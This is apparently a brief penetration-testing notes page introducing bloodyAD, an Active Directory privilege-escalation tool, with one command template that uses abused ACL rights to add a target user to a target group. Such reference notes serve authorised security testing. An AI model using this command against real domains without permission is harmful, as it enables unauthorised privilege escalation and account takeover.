bloodyAD

bloodyAD is an Active Directory privilege escalation swiss army knife

God level tool which can help with abusing acl's like ForcePasswordChange and many more. (https://www.thehacker.recipes/a-d/movement/dacl/addmember) 

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember $TargetGroup $TargetUser
PreviousGenerating a reportNextDifferent flags like AddMember and more

Last updated